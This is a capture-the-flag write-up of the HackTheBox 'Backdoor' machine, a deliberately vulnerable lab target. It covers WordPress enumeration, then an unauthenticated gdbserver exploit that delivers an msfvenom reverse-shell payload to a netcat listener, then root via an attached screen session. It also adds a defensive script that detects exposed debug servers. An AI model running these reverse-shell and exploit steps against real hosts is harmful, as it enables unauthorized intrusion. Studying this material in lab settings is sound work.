Backdoor is one of the machines currently available on the HackTheBox hacking platform and is rated Easy.
In this case it is a machine based on the Linux operating system.
Port scanning
As usual, we add the IP of the Backdoor machine, 10.10.11.125, to /etc/hosts as backdoor.htb and start with the nmap port scan.
```
# Nmap 7.92 scan initiated Wed Dec 29 11:59:58 2021 as: nmap -sV -sC -p- -oA enumeration/nmap2 10.10.11.125
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.050s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 29 12:00:41 2021 -- 1 IP address (1 host up) scanned in 43.49 seconds
```
We see several open ports, so let's look at what we can find on each of them.
Enumeration
The scan itself already shows a web portal running the WordPress CMS, version 5.8.1; opening the portal we find the following page.
Now that we know the version, we run several enumerations to see what else we can find, starting with directory enumeration with gobuster:
```
$ gobuster dir -u http://backdoor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://backdoor.htb/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/29 11:56:59 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/wp-admin             (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/server-status        (Status: 403) [Size: 277]
===============================================================
2021/12/29 11:58:44 Finished
===============================================================
```
Available exploits
```
$ searchsploit Wordpress 5.8.1
-------------------------------------------------------------------- ---------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection           | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection         | php/webapps/48918.sh
-------------------------------------------------------------------- ---------------------------
Shellcodes: No Results
```
Or a scan with the wpscan tool:
```
$ wpscan --url http://backdoor.htb --api-token sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]
[+] Started: Wed Dec 29 12:04:37 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://backdoor.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.8.2
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207

[+] WordPress theme in use: twentyseventeen
 | Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <==========================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Wed Dec 29 12:04:46 2021
[+] Requests Done: 175
[+] Cached Requests: 5
[+] Data Sent: 44.419 KB
[+] Data Received: 518.888 KB
[+] Memory used: 241.133 MB
[+] Elapsed time: 00:00:09
```
Reviewing these results and searching Google we find a few options but nothing relevant at this point, so we move on to port 1337, which corresponds to gdbserver, and find a Python exploit for it that gives us access to the machine.
So, following the exploit's help:
```
$ python3 gdbexploit.py -h
Usage: python3 gdbexploit.py <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver    -> 10.10.10.200:1337
- Attacker's listener   -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 gdbexploit.py 10.10.10.200:1337 rev.bin
```
First we generate our shellcode:
```
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 92 bytes
Saved as: rev.bin
```
We start our netcat listener and launch the exploit:
```
$ python3 gdbexploit.py 10.10.11.125:1337 ../payloads/rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
```
And we get access to the machine as the user "user":
```
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from backdoor.htb [10.10.11.125] 56906
id
uid=1000(user) gid=1000(user) groups=1000(user)
```
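The root cause here is not a bug in gdbserver: the GDB remote protocol has no authentication and exists to load and run code in a debuggee, so a gdbserver reachable from the network is by design a remote code execution service for anyone who can connect. The check a defender would run on the host is to look for debug servers bound to anything other than loopback. The script below is an added example and is not part of the original writeup or of the exploit's code; it parses the output of `ss -ltnp` (the sample lines are constructed here, with one listener modelled on the 1337/tcp service of this box) and reports exposed debuggers. The process names in `RISKY_PROCESSES` and the loopback list are assumptions that can be extended.

```python
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Processes that run code for whoever connects and therefore must never
# listen on a non-loopback address (assumption: our own list, extend as needed).
RISKY_PROCESSES = {"gdbserver", "lldb-server"}
LOOPBACK = {"127.0.0.1", "[::1]", "::1"}

# Matches the first process entry of an `ss -p` column: users:(("gdbserver",pid=842,fd=3))
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


@dataclass
class Listener:
    addr: str
    port: int
    process: Optional[str]
    pid: Optional[int]

    @property
    def exposed(self) -> bool:
        """True when the socket is bound to something other than loopback."""
        return self.addr not in LOOPBACK


def parse_ss(output: str) -> List[Listener]:
    """Parse `ss -ltnp` output into Listener records, skipping the header."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        # Local address is column 4; split on the last ':' so IPv6 ("[::]:22") survives.
        addr, port = fields[3].rsplit(":", 1)
        m = PROC_RE.search(line)
        listeners.append(
            Listener(addr, int(port), m.group(1) if m else None, int(m.group(2)) if m else None)
        )
    return listeners


def find_exposed_debuggers(listeners: List[Listener]) -> List[Listener]:
    """Return listeners that are both network-reachable and a known debug server."""
    return [l for l in listeners if l.exposed and l.process in RISKY_PROCESSES]


def live_listeners() -> List[Listener]:
    """Run ss on the current host (Linux with iproute2) and parse its output."""
    out = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True, check=True).stdout
    return parse_ss(out)


# Constructed sample: sshd and apache2 as on the box, a gdbserver on 0.0.0.0:1337
# (the dangerous case) and a second gdbserver correctly limited to loopback.
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*    users:(("sshd",pid=731,fd=3))
LISTEN 0      511                *:80               *:*    users:(("apache2",pid=905,fd=4),("apache2",pid=904,fd=4))
LISTEN 0      1            0.0.0.0:1337       0.0.0.0:*    users:(("gdbserver",pid=842,fd=3))
LISTEN 0      1          127.0.0.1:2345       0.0.0.0:*    users:(("gdbserver",pid=990,fd=3))
LISTEN 0      128             [::]:22            [::]:*    users:(("sshd",pid=731,fd=4))
"""

if __name__ == "__main__":
    for l in find_exposed_debuggers(parse_ss(SAMPLE_SS)):
        print(f"EXPOSED debug server: {l.process} (pid {l.pid}) listening on {l.addr}:{l.port}")
```

Swap `parse_ss(SAMPLE_SS)` for `live_listeners()` to audit a real host; the fix for a hit is to bind the debugger to 127.0.0.1 and reach it over an SSH tunnel, or not to leave gdbserver running at all.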
Getting the user flag
Now that we have access, we upgrade to a proper shell with python and grab our flag:
```
user@Backdoor:/home/user$ ls -l
ls -l
total 4
-rw-r----- 1 root user 33 Dec 29 10:57 user.txt
user@Backdoor:/home/user$ cat user.txt
cat user.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9
user@Backdoor:/home/user$
```
Privilege escalation
To escalate privileges we review the existing files, permissions, processes, etc., and find an interesting process with pspy:
```
user@Backdoor:/home/user$ ps aux|grep screen
ps aux|grep screen
root         859  0.0  0.0   2608  1600 ?        Ss   10:57   0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
```
This loop is also run periodically via a cron job as root, so it looks like a possible route.
We try to run screen ourselves and get an error, because we have no terminal type defined:
```
user@Backdoor:/home/user$ screen
screen
Please set a terminal type.
```
So we export the TERM variable with a terminal type:
```
user@Backdoor:/home/user$ export TERM=xterm
export TERM=xterm
```
And we launch screen, attaching to the session that root's loop keeps creating, which is named root as well, to escalate to that user:
```
user@Backdoor:/home/user$ screen -x root/root
root@Backdoor:~# id
id
uid=0(root) gid=0(root) groups=0(root)
```
Getting the root flag
Now that we are root, all that remains is to get our flag:
```
root@Backdoor:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 33 Dec 29 10:57 root.txt
root@Backdoor:~# cat root.txt
cat root.txt
9xxxxxxxxxxxxxxxxxxxxxxxxxxxx0
root@Backdoor:~#
```
And with that we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link.